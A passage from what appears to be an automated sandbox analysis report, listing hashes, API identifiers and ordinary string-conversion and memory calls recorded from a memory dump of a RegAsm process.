                                                                                                                                                                      • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                      • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                      • Opcode ID: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                      • Opcode Fuzzy Hash: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5